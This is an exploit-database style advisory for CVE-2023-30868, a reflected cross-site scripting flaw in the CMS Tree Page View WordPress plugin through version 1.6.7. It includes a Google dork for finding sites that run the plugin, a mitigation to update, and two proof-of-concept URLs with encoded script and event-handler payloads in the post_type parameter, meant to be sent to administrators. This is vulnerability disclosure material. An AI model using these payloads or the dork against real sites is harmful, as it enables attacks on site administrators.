Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)

vendor:

CMS Tree Page View

by:

LEE SE HYOUNG

6.1

CVSS

MEDIUM

Cross Site Scripting (XSS)

CWE

Product Name: CMS Tree Page View

Affected Version From: 1.6.2000

Affected Version To: 1.6.2007

Patch Exists: YES

Related CWE: CVE-2023-30868

CPE: wordpress:cms_tree_page_view:1.6.7

Metasploit:

Other Scripts:

Platforms Tested: Debian / WordPress 6.1.1

2023

Tree Page View Plugin 1.6.7 – Cross Site Scripting (XSS)

The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the CMS Tree Page View plugin.

Source

Exploit-DB raw data:

# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve

# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.

# 2. Proof of Concept (PoC):

WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.

1. CMS Tree Page View Plugin <= 1.6.6

a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.

b. your payload will be executed. [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

2. CMS Tree Page View Plugin <= 1.6.7

a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.

b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.